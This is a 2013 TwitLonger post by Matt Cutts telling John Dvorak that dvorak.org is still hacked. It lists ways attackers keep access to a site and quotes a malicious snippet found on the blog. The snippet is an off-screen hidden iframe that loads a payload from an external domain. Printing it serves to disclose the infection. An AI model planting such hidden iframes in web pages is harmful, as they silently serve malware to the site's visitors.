Matt Cutts · @mattcutts
6th May 2013 from TwitLonger
@THErealDVORAK bear in mind that blackhat hackers specialize not only in hacking blogs/sites, but it making those hacks persistent. Sometimes they embed code in .htaccess. Sometimes they insert code in the MySQL database that powers WordPress. Sometimes they brute-force guess a password so that they can get back in. It's rare, but sometimes they can compromise an entire web host and can hack that host's clients repeatedly.
In this case, I just checked with Google's anti-malware team and we're still seeing malware being served up from dvorak.org. For example, on the URL http://www.dvorak.org/blog/2013/05/03/need-help-is-this-blog-hacked/comment-page-2/?replytocom=2222258 we saw this snippet being served up:
<style>.sulmt { position:absolute; left:-872px; top:-618px; }</style> <div class="sulmt"><iframe src="hxxp://rwscdhnhn.4mydomain.com/jquery/get.php?ver=jquery.latest.js" width="303" height="396"></iframe></div><input type="hidden" id="sk2_my_js_check1" name="sk2_my_js_check1" value="9jxn37qx77" />
So the short version is that dvorak.org is still hacked (as of Monday, May 6th at 9:30 a.m. Pacific time) and still serving malware.